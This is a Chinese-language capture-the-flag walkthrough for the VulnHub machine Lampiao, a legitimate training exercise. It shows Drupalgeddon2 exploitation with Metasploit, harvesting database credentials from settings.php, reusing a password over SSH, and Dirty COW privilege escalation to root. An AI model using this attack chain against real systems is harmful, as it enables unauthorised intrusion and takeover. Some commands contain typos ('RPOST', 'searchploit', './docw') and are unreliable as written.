vulnhub靶机-Lampiao

搭好环境之后，找到靶机的ip，我这里是10.22.102.174，nmap扫描端口，nmap -p- 10.22.102.174

发现80端口，访问一下

再访问一下1898端口，利用谷歌插件wappalyzer发现这个网站是Drupal7 cms

 直接上网百度相关漏洞，发现一大堆，其中发现一个CVE-2018-7600

进入kali，打开终端，输入msfconsole，进入之后，输入search drupal，搜索drupal相关的漏洞利用模块，在下面发现一个2018年的，直接利用，如果没有，就自行百度更新一下msf

然后输入use exploit/unix/webapp/drupal_drupalgeddon2，然后输入show options，查看一下需要配置的选项

输入set RHOST 10.22.102.174（这里是我的靶机ip），然后输入set RPOST 1898配置端口号，然后输入exploit进行攻击，发现攻击成功

输入shell，进入到不完全的交互界面，这时候没有提示信息，可以直接输入ls看看有没有执行成功

使用cat sites/default/settings.php查看配置文件，发现连接数据库的用户名drupaluser和密码Virgulino

使用ls /home查看除了root外还有哪些用户，发现用户tiago

尝试用用户名tiago和数据库的密码使用ssh连接，nice，成功连接，但是不能用sudo su进行提权

最后使用脏牛提权，查看靶机内核：

uname -a

发现是2016年的，直接在kali里面搜索利用脚本

searchploit dirty

 将这个文件复制到当前目录

cp /usr/share/exploitdb/exploits/linux/local/40847.cpp ~

打开文件，将这个文件拖到真机里，使用文本编辑器打开，全选复制

然后在ssh下vi dirtycow.cpp编辑一个dirtycow.cpp的文件，先输入i进行编辑，然后再将刚刚复制的东西粘贴进去

保存退出

编译cpp文件：
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dirtycow.cpp -lutil

-Wall 一般使用该选项，允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别，-O0表示没有优化,-O1为缺省值，-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时，需要链接pthread库
-o dcow gcc生成的目标文件,名字为dcow

./docw -s 即可得到root权限

最后cat flag.txt得到flag